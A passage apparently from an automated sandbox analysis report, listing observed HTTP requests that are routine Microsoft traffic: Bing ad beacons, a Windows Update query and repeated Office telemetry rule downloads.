arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /aes/c.gif?RG=11838b58e3bd49c2868b9488d8366633&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20241207T095141Z&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: www.bing.comConnection: Keep-AliveCookie: MUID=0A49FE9DEB916FEB0960EBD3EAF36E5C
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PYwZb5jzUszxXLhoKSvtQDVUCUz2DQQTbtfuHORf_W5QwxBOzlUBs9_EJcUhJgqAU9uX9BQciAkz3E-HbgLnhhz1TwN9WGpscjesnNfGXGZDVfXefq7gYrjtb6kzUmTiaEgS-OCNys-1nUln_W_a46hGPe1h6gVE1L8JE7qshXCdq7tj%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmZWRnZSUyZndpbmRvd3MtZWRnZSUzZmZvY3VzJTNkY29udmVuaW5jZSUyNnNvdXJjZSUzZGlwJTI2ZXMlM2QwJTI2Zm9ybSUzZE01MDBFNyUyNk9DSUQlM2RNNTAwRTc%26rlid%3D88a3a4f4da3e118b1d56c3a0c0aba7aa&TIME=20241207T095141Z&CID=531538185&EID=&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1Accept-Encoding: gzip, deflateUser-Agent: WindowsShellClient/9.0.40929.0 (Windows)Host: g.bing.comConnection: Keep-AliveCookie: MUID=0A49FE9DEB916FEB0960EBD3EAF36E5C; _EDGE_S=SID=0FA82018DF2A6F023D4C3556DE326EFE; MR=0
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xDWM6ApMeetRAR&MD=299fFNu4 HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
